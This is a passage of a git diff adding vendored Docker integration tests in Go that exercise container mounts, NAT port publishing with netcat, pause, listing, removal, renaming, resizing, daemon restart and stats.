"github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/system" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" + "gotest.tools/skip" +) + +func TestContainerNetworkMountsNoChown(t *testing.T) { + // chown only applies to Linux bind mounted volumes; must be same host to verify + skip.If(t, testEnv.DaemonInfo.OSType != "linux" || testEnv.IsRemoteDaemon()) + + defer setupTest(t)() + + ctx := context.Background() + + tmpDir := fs.NewDir(t, "network-file-mounts", fs.WithMode(0755), fs.WithFile("nwfile", "network file bind mount", fs.WithMode(0644))) + defer tmpDir.Remove() + + tmpNWFileMount := tmpDir.Join("nwfile") + + config := container.Config{ + Image: "busybox", + } + hostConfig := container.HostConfig{ + Mounts: []mount.Mount{ + { + Type: "bind", + Source: tmpNWFileMount, + Target: "/etc/resolv.conf", + }, + { + Type: "bind", + Source: tmpNWFileMount, + 
Target: "/etc/hostname", + }, + { + Type: "bind", + Source: tmpNWFileMount, + Target: "/etc/hosts", + }, + }, + } + + cli, err := client.NewEnvClient() + assert.NilError(t, err) + defer cli.Close() + + ctrCreate, err := cli.ContainerCreate(ctx, &config, &hostConfig, &network.NetworkingConfig{}, "") + assert.NilError(t, err) + // container will exit immediately because of no tty, but we only need the start sequence to test the condition + err = cli.ContainerStart(ctx, ctrCreate.ID, types.ContainerStartOptions{}) + assert.NilError(t, err) + + // Check that host-located bind mount network file did not change ownership when the container was started + // Note: If the user specifies a mountpath from the host, we should not be + // attempting to chown files outside the daemon's metadata directory + // (represented by `daemon.repository` at init time). + // This forces users who want to use user namespaces to handle the + // ownership needs of any external files mounted as network files + // (/etc/resolv.conf, /etc/hosts, /etc/hostname) separately from the + // daemon. In all other volume/bind mount situations we have taken this + // same line--we don't chown host file content. + // See GitHub PR 34224 for details. 
+ statT, err := system.Stat(tmpNWFileMount) + assert.NilError(t, err) + assert.Check(t, is.Equal(uint32(0), statT.UID()), "bind mounted network file should not change ownership from root") +} + +func TestMountDaemonRoot(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux" || testEnv.IsRemoteDaemon()) + t.Parallel() + + client := request.NewAPIClient(t) + ctx := context.Background() + info, err := client.Info(ctx) + if err != nil { + t.Fatal(err) + } + + for _, test := range []struct { + desc string + propagation mount.Propagation + expected mount.Propagation + }{ + { + desc: "default", + propagation: "", + expected: mount.PropagationRSlave, + }, + { + desc: "private", + propagation: mount.PropagationPrivate, + }, + { + desc: "rprivate", + propagation: mount.PropagationRPrivate, + }, + { + desc: "slave", + propagation: mount.PropagationSlave, + }, + { + desc: "rslave", + propagation: mount.PropagationRSlave, + expected: mount.PropagationRSlave, + }, + { + desc: "shared", + propagation: mount.PropagationShared, + }, + { + desc: "rshared", + propagation: mount.PropagationRShared, + expected: mount.PropagationRShared, + }, + } { + t.Run(test.desc, func(t *testing.T) { + test := test + t.Parallel() + + propagationSpec := fmt.Sprintf(":%s", test.propagation) + if test.propagation == "" { + propagationSpec = "" + } + bindSpecRoot := info.DockerRootDir + ":" + "/foo" + propagationSpec + bindSpecSub := filepath.Join(info.DockerRootDir, "containers") + ":/foo" + propagationSpec + + for name, hc := range map[string]*container.HostConfig{ + "bind root": {Binds: []string{bindSpecRoot}}, + "bind subpath": {Binds: []string{bindSpecSub}}, + "mount root": { + Mounts: []mount.Mount{ + { + Type: mount.TypeBind, + Source: info.DockerRootDir, + Target: "/foo", + BindOptions: &mount.BindOptions{Propagation: test.propagation}, + }, + }, + }, + "mount subpath": { + Mounts: []mount.Mount{ + { + Type: mount.TypeBind, + Source: filepath.Join(info.DockerRootDir, "containers"), + 
Target: "/foo", + BindOptions: &mount.BindOptions{Propagation: test.propagation}, + }, + }, + }, + } { + t.Run(name, func(t *testing.T) { + hc := hc + t.Parallel() + + c, err := client.ContainerCreate(ctx, &container.Config{ + Image: "busybox", + Cmd: []string{"true"}, + }, hc, nil, "") + + if err != nil { + if test.expected != "" { + t.Fatal(err) + } + // expected an error, so this is ok and should not continue + return + } + if test.expected == "" { + t.Fatal("expected create to fail") + } + + defer func() { + if err := client.ContainerRemove(ctx, c.ID, types.ContainerRemoveOptions{Force: true}); err != nil { + panic(err) + } + }() + + inspect, err := client.ContainerInspect(ctx, c.ID) + if err != nil { + t.Fatal(err) + } + if len(inspect.Mounts) != 1 { + t.Fatalf("unexpected number of mounts: %+v", inspect.Mounts) + } + + m := inspect.Mounts[0] + if m.Propagation != test.expected { + t.Fatalf("got unexpected propagation mode, expected %q, got: %v", test.expected, m.Propagation) + } + }) + } + }) + } +} diff --git a/vendor/github.com/docker/docker/integration/container/nat_test.go b/vendor/github.com/docker/docker/integration/container/nat_test.go new file mode 100644 index 0000000000..0dbed897db --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/nat_test.go @@ -0,0 +1,120 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "bytes" + "context" + "fmt" + "io" + "io/ioutil" + "net" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "github.com/docker/go-connections/nat" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestNetworkNat(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + + defer setupTest(t)() + + msg := "it works" + startServerContainer(t, msg, 8080) + + endpoint := getExternalAddress(t) 
+ conn, err := net.Dial("tcp", fmt.Sprintf("%s:%d", endpoint.String(), 8080)) + assert.NilError(t, err) + defer conn.Close() + + data, err := ioutil.ReadAll(conn) + assert.NilError(t, err) + assert.Check(t, is.Equal(msg, strings.TrimSpace(string(data)))) +} + +func TestNetworkLocalhostTCPNat(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + + defer setupTest(t)() + + msg := "hi yall" + startServerContainer(t, msg, 8081) + + conn, err := net.Dial("tcp", "localhost:8081") + assert.NilError(t, err) + defer conn.Close() + + data, err := ioutil.ReadAll(conn) + assert.NilError(t, err) + assert.Check(t, is.Equal(msg, strings.TrimSpace(string(data)))) +} + +func TestNetworkLoopbackNat(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + + defer setupTest(t)() + + msg := "it works" + serverContainerID := startServerContainer(t, msg, 8080) + + endpoint := getExternalAddress(t) + + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", fmt.Sprintf("stty raw && nc -w 5 %s 8080", endpoint.String())), container.WithTty(true), container.WithNetworkMode("container:"+serverContainerID)) + + poll.WaitOn(t, container.IsStopped(ctx, client, cID), poll.WithDelay(100*time.Millisecond)) + + body, err := client.ContainerLogs(ctx, cID, types.ContainerLogsOptions{ + ShowStdout: true, + }) + assert.NilError(t, err) + defer body.Close() + + var b bytes.Buffer + _, err = io.Copy(&b, body) + assert.NilError(t, err) + + assert.Check(t, is.Equal(msg, strings.TrimSpace(b.String()))) +} + +func startServerContainer(t *testing.T, msg string, port int) string { + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithName("server-"+t.Name()), container.WithCmd("sh", "-c", fmt.Sprintf("echo %q | nc -lp %d", msg, port)), container.WithExposedPorts(fmt.Sprintf("%d/tcp", port)), func(c *container.TestContainerConfig) { + c.HostConfig.PortBindings = 
nat.PortMap{ + nat.Port(fmt.Sprintf("%d/tcp", port)): []nat.PortBinding{ + { + HostPort: fmt.Sprintf("%d", port), + }, + }, + } + }) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + return cID +} + +func getExternalAddress(t *testing.T) net.IP { + iface, err := net.InterfaceByName("eth0") + skip.If(t, err != nil, "Test not running with `make test-integration`. Interface eth0 not found: %s", err) + + ifaceAddrs, err := iface.Addrs() + assert.NilError(t, err) + assert.Check(t, 0 != len(ifaceAddrs)) + + ifaceIP, _, err := net.ParseCIDR(ifaceAddrs[0].String()) + assert.NilError(t, err) + + return ifaceIP +} diff --git a/vendor/github.com/docker/docker/integration/container/pause_test.go b/vendor/github.com/docker/docker/integration/container/pause_test.go new file mode 100644 index 0000000000..8dd2d784b7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/pause_test.go @@ -0,0 +1,98 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "io" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestPause(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType == "windows" && testEnv.DaemonInfo.Isolation == "process") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + since := request.DaemonUnixTime(ctx, t, client, testEnv) + + err := client.ContainerPause(ctx, cID) + assert.NilError(t, 
err) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal(true, inspect.State.Paused)) + + err = client.ContainerUnpause(ctx, cID) + assert.NilError(t, err) + + until := request.DaemonUnixTime(ctx, t, client, testEnv) + + messages, errs := client.Events(ctx, types.EventsOptions{ + Since: since, + Until: until, + Filters: filters.NewArgs(filters.Arg("container", cID)), + }) + assert.Check(t, is.DeepEqual([]string{"pause", "unpause"}, getEventActions(t, messages, errs))) +} + +func TestPauseFailsOnWindowsServerContainers(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "windows" || testEnv.DaemonInfo.Isolation != "process") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + err := client.ContainerPause(ctx, cID) + assert.Check(t, is.ErrorContains(err, "cannot pause Windows Server Containers")) +} + +func TestPauseStopPausedContainer(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.31"), "broken in earlier versions") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + err := client.ContainerPause(ctx, cID) + assert.NilError(t, err) + + err = client.ContainerStop(ctx, cID, nil) + assert.NilError(t, err) + + poll.WaitOn(t, container.IsStopped(ctx, client, cID), poll.WithDelay(100*time.Millisecond)) +} + +func getEventActions(t *testing.T, messages <-chan events.Message, errs <-chan error) []string { + var actions []string + for { + select { + case err := <-errs: + assert.Check(t, err == nil || err == io.EOF) + return actions + case e := <-messages: + actions 
= append(actions, e.Status) + } + } +} diff --git a/vendor/github.com/docker/docker/integration/container/ps_test.go b/vendor/github.com/docker/docker/integration/container/ps_test.go new file mode 100644 index 0000000000..4ae07043ab --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/ps_test.go @@ -0,0 +1,49 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestPsFilter(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + prev := container.Create(t, ctx, client) + top := container.Create(t, ctx, client) + next := container.Create(t, ctx, client) + + containerIDs := func(containers []types.Container) []string { + var entries []string + for _, container := range containers { + entries = append(entries, container.ID) + } + return entries + } + + f1 := filters.NewArgs() + f1.Add("since", top) + q1, err := client.ContainerList(ctx, types.ContainerListOptions{ + All: true, + Filters: f1, + }) + assert.NilError(t, err) + assert.Check(t, is.Contains(containerIDs(q1), next)) + + f2 := filters.NewArgs() + f2.Add("before", top) + q2, err := client.ContainerList(ctx, types.ContainerListOptions{ + All: true, + Filters: f2, + }) + assert.NilError(t, err) + assert.Check(t, is.Contains(containerIDs(q2), prev)) +} diff --git a/vendor/github.com/docker/docker/integration/container/remove_test.go b/vendor/github.com/docker/docker/integration/container/remove_test.go new file mode 100644 index 0000000000..5de13f22ad --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/remove_test.go @@ -0,0 +1,112 @@ +package container // import 
"github.com/docker/docker/integration/container" + +import ( + "context" + "os" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) { + if testEnv.OSType == "windows" { + return "c:", `\` + } + return "", "/" +} + +// Test case for #5244: `docker rm` fails if bind dir doesn't exist anymore +func TestRemoveContainerWithRemovedVolume(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + tempDir := fs.NewDir(t, "test-rm-container-with-removed-volume", fs.WithMode(0755)) + defer tempDir.Remove() + + cID := container.Run(t, ctx, client, container.WithCmd("true"), container.WithBind(tempDir.Path(), prefix+slash+"test")) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond)) + + err := os.RemoveAll(tempDir.Path()) + assert.NilError(t, err) + + err = client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{ + RemoveVolumes: true, + }) + assert.NilError(t, err) + + _, _, err = client.ContainerInspectWithRaw(ctx, cID, true) + assert.Check(t, is.ErrorContains(err, "No such container")) +} + +// Test case for #2099/#2125 +func TestRemoveContainerWithVolume(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + cID := container.Run(t, ctx, client, container.WithCmd("true"), container.WithVolume(prefix+slash+"srv")) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), 
poll.WithDelay(100*time.Millisecond)) + + insp, _, err := client.ContainerInspectWithRaw(ctx, cID, true) + assert.NilError(t, err) + assert.Check(t, is.Equal(1, len(insp.Mounts))) + volName := insp.Mounts[0].Name + + err = client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{ + RemoveVolumes: true, + }) + assert.NilError(t, err) + + volumes, err := client.VolumeList(ctx, filters.NewArgs(filters.Arg("name", volName))) + assert.NilError(t, err) + assert.Check(t, is.Equal(0, len(volumes.Volumes))) +} + +func TestRemoveContainerRunning(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client) + + err := client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{}) + assert.Check(t, is.ErrorContains(err, "cannot remove a running container")) +} + +func TestRemoveContainerForceRemoveRunning(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client) + + err := client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{ + Force: true, + }) + assert.NilError(t, err) +} + +func TestRemoveInvalidContainer(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + err := client.ContainerRemove(ctx, "unknown", types.ContainerRemoveOptions{}) + assert.Check(t, is.ErrorContains(err, "No such container")) +} diff --git a/vendor/github.com/docker/docker/integration/container/rename_test.go b/vendor/github.com/docker/docker/integration/container/rename_test.go new file mode 100644 index 0000000000..c3f46e10c2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/rename_test.go @@ -0,0 +1,213 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "testing" + "time" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + 
"github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/stringid" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +// This test simulates the scenario mentioned in #31392: +// Having two linked container, renaming the target and bringing a replacement +// and then deleting and recreating the source container linked to the new target. +// This checks that "rename" updates source container correctly and doesn't set it to null. +func TestRenameLinkedContainer(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.32"), "broken in earlier versions") + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + aName := "a0" + t.Name() + bName := "b0" + t.Name() + aID := container.Run(t, ctx, client, container.WithName(aName)) + bID := container.Run(t, ctx, client, container.WithName(bName), container.WithLinks(aName)) + + err := client.ContainerRename(ctx, aID, "a1"+t.Name()) + assert.NilError(t, err) + + container.Run(t, ctx, client, container.WithName(aName)) + + err = client.ContainerRemove(ctx, bID, types.ContainerRemoveOptions{Force: true}) + assert.NilError(t, err) + + bID = container.Run(t, ctx, client, container.WithName(bName), container.WithLinks(aName)) + + inspect, err := client.ContainerInspect(ctx, bID) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual([]string{"/" + aName + ":/" + bName + "/" + aName}, inspect.HostConfig.Links)) +} + +func TestRenameStoppedContainer(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + oldName := "first_name" + t.Name() + cID := container.Run(t, ctx, client, container.WithName(oldName), container.WithCmd("sh")) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), 
poll.WithDelay(100*time.Millisecond)) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal("/"+oldName, inspect.Name)) + + newName := "new_name" + stringid.GenerateNonCryptoID() + err = client.ContainerRename(ctx, oldName, newName) + assert.NilError(t, err) + + inspect, err = client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal("/"+newName, inspect.Name)) +} + +func TestRenameRunningContainerAndReuse(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + oldName := "first_name" + t.Name() + cID := container.Run(t, ctx, client, container.WithName(oldName)) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + newName := "new_name" + stringid.GenerateNonCryptoID() + err := client.ContainerRename(ctx, oldName, newName) + assert.NilError(t, err) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal("/"+newName, inspect.Name)) + + _, err = client.ContainerInspect(ctx, oldName) + assert.Check(t, is.ErrorContains(err, "No such container: "+oldName)) + + cID = container.Run(t, ctx, client, container.WithName(oldName)) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + inspect, err = client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal("/"+oldName, inspect.Name)) +} + +func TestRenameInvalidName(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + oldName := "first_name" + t.Name() + cID := container.Run(t, ctx, client, container.WithName(oldName)) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + err := client.ContainerRename(ctx, oldName, "new:invalid") + assert.Check(t, is.ErrorContains(err, "Invalid container name")) + + 
inspect, err := client.ContainerInspect(ctx, oldName) + assert.NilError(t, err) + assert.Check(t, is.Equal(cID, inspect.ID)) +} + +// Test case for GitHub issue 22466 +// Docker's service discovery works for named containers so +// ping to a named container should work, and an anonymous +// container without a name does not work with service discovery. +// However, an anonymous could be renamed to a named container. +// This test is to make sure once the container has been renamed, +// the service discovery for the (re)named container works. +func TestRenameAnonymousContainer(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + networkName := "network1" + t.Name() + _, err := client.NetworkCreate(ctx, networkName, types.NetworkCreate{}) + + assert.NilError(t, err) + cID := container.Run(t, ctx, client, func(c *container.TestContainerConfig) { + c.NetworkingConfig.EndpointsConfig = map[string]*network.EndpointSettings{ + networkName: {}, + } + c.HostConfig.NetworkMode = containertypes.NetworkMode(networkName) + }) + + container1Name := "container1" + t.Name() + err = client.ContainerRename(ctx, cID, container1Name) + assert.NilError(t, err) + // Stop/Start the container to get registered + // FIXME(vdemeester) this is a really weird behavior as it fails otherwise + err = client.ContainerStop(ctx, container1Name, nil) + assert.NilError(t, err) + err = client.ContainerStart(ctx, container1Name, types.ContainerStartOptions{}) + assert.NilError(t, err) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + count := "-c" + if testEnv.OSType == "windows" { + count = "-n" + } + cID = container.Run(t, ctx, client, func(c *container.TestContainerConfig) { + c.NetworkingConfig.EndpointsConfig = map[string]*network.EndpointSettings{ + networkName: {}, + } + c.HostConfig.NetworkMode = containertypes.NetworkMode(networkName) + }, container.WithCmd("ping", count, "1", 
container1Name)) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond)) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal(0, inspect.State.ExitCode), "container %s exited with the wrong exitcode: %+v", cID, inspect) +} + +// TODO: should be a unit test +func TestRenameContainerWithSameName(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + oldName := "old" + t.Name() + cID := container.Run(t, ctx, client, container.WithName(oldName)) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + err := client.ContainerRename(ctx, oldName, oldName) + assert.Check(t, is.ErrorContains(err, "Renaming a container with the same name")) + err = client.ContainerRename(ctx, cID, oldName) + assert.Check(t, is.ErrorContains(err, "Renaming a container with the same name")) +} + +// Test case for GitHub issue 23973 +// When a container is being renamed, the container might +// be linked to another container. In that case, the meta data +// of the linked container should be updated so that the other +// container could still reference to the container that is renamed. 
+func TestRenameContainerWithLinkedContainer(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + db1Name := "db1" + t.Name() + db1ID := container.Run(t, ctx, client, container.WithName(db1Name)) + poll.WaitOn(t, container.IsInState(ctx, client, db1ID, "running"), poll.WithDelay(100*time.Millisecond)) + + app1Name := "app1" + t.Name() + app2Name := "app2" + t.Name() + app1ID := container.Run(t, ctx, client, container.WithName(app1Name), container.WithLinks(db1Name+":/mysql")) + poll.WaitOn(t, container.IsInState(ctx, client, app1ID, "running"), poll.WithDelay(100*time.Millisecond)) + + err := client.ContainerRename(ctx, app1Name, app2Name) + assert.NilError(t, err) + + inspect, err := client.ContainerInspect(ctx, app2Name+"/mysql") + assert.NilError(t, err) + assert.Check(t, is.Equal(db1ID, inspect.ID)) +} diff --git a/vendor/github.com/docker/docker/integration/container/resize_test.go b/vendor/github.com/docker/docker/integration/container/resize_test.go new file mode 100644 index 0000000000..5961af0a47 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/resize_test.go @@ -0,0 +1,66 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "net/http" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + req "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestResize(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + err := 
client.ContainerResize(ctx, cID, types.ResizeOptions{ + Height: 40, + Width: 40, + }) + assert.NilError(t, err) +} + +func TestResizeWithInvalidSize(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.32"), "broken in earlier versions") + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + endpoint := "/containers/" + cID + "/resize?h=foo&w=bar" + res, _, err := req.Post(endpoint) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(http.StatusBadRequest, res.StatusCode)) +} + +func TestResizeWhenContainerNotStarted(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithCmd("echo")) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond)) + + err := client.ContainerResize(ctx, cID, types.ResizeOptions{ + Height: 40, + Width: 40, + }) + assert.Check(t, is.ErrorContains(err, "is not running")) +} diff --git a/vendor/github.com/docker/docker/integration/container/restart_test.go b/vendor/github.com/docker/docker/integration/container/restart_test.go new file mode 100644 index 0000000000..69007218f1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/restart_test.go @@ -0,0 +1,114 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "fmt" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + "gotest.tools/skip" +) + +func TestDaemonRestartKillContainers(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, "cannot start daemon on remote test run") + type testCase struct { + desc string + config 
*container.Config + hostConfig *container.HostConfig + + xRunning bool + xRunningLiveRestore bool + xStart bool + } + + for _, c := range []testCase{ + { + desc: "container without restart policy", + config: &container.Config{Image: "busybox", Cmd: []string{"top"}}, + xRunningLiveRestore: true, + xStart: true, + }, + { + desc: "container with restart=always", + config: &container.Config{Image: "busybox", Cmd: []string{"top"}}, + hostConfig: &container.HostConfig{RestartPolicy: container.RestartPolicy{Name: "always"}}, + xRunning: true, + xRunningLiveRestore: true, + xStart: true, + }, + { + desc: "container created should not be restarted", + config: &container.Config{Image: "busybox", Cmd: []string{"top"}}, + hostConfig: &container.HostConfig{RestartPolicy: container.RestartPolicy{Name: "always"}}, + }, + } { + for _, liveRestoreEnabled := range []bool{false, true} { + for fnName, stopDaemon := range map[string]func(*testing.T, *daemon.Daemon){ + "kill-daemon": func(t *testing.T, d *daemon.Daemon) { + err := d.Kill() + assert.NilError(t, err) + }, + "stop-daemon": func(t *testing.T, d *daemon.Daemon) { + d.Stop(t) + }, + } { + t.Run(fmt.Sprintf("live-restore=%v/%s/%s", liveRestoreEnabled, c.desc, fnName), func(t *testing.T) { + c := c + liveRestoreEnabled := liveRestoreEnabled + stopDaemon := stopDaemon + + t.Parallel() + + d := daemon.New(t) + client, err := d.NewClient() + assert.NilError(t, err) + + args := []string{"--iptables=false"} + if liveRestoreEnabled { + args = append(args, "--live-restore") + } + + d.StartWithBusybox(t, args...) + defer d.Stop(t) + ctx := context.Background() + + resp, err := client.ContainerCreate(ctx, c.config, c.hostConfig, nil, "") + assert.NilError(t, err) + defer client.ContainerRemove(ctx, resp.ID, types.ContainerRemoveOptions{Force: true}) + + if c.xStart { + err = client.ContainerStart(ctx, resp.ID, types.ContainerStartOptions{}) + assert.NilError(t, err) + } + + stopDaemon(t, d) + d.Start(t, args...) 
+ + expected := c.xRunning + if liveRestoreEnabled { + expected = c.xRunningLiveRestore + } + + var running bool + for i := 0; i < 30; i++ { + inspect, err := client.ContainerInspect(ctx, resp.ID) + assert.NilError(t, err) + + running = inspect.State.Running + if running == expected { + break + } + time.Sleep(2 * time.Second) + + } + assert.Equal(t, expected, running, "got unexpected running state, expected %v, got: %v", expected, running) + // TODO(cpuguy83): test pause states... this seems to be rather undefined currently + }) + } + } + } +} diff --git a/vendor/github.com/docker/docker/integration/container/stats_test.go b/vendor/github.com/docker/docker/integration/container/stats_test.go new file mode 100644 index 0000000000..6493a30573 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/stats_test.go @@ -0,0 +1,43 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "encoding/json" + "io" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestStats(t *testing.T) { + skip.If(t, !testEnv.DaemonInfo.MemoryLimit) + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + info, err := client.Info(ctx) + assert.NilError(t, err) + + cID := container.Run(t, ctx, client) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + resp, err := client.ContainerStats(ctx, cID, false) + assert.NilError(t, err) + defer resp.Body.Close() + + var v *types.Stats + err = json.NewDecoder(resp.Body).Decode(&v) + assert.NilError(t, err) + assert.Check(t, is.Equal(int64(v.MemoryStats.Limit), info.MemTotal)) + err = json.NewDecoder(resp.Body).Decode(&v) + assert.Assert(t, is.ErrorContains(err, 
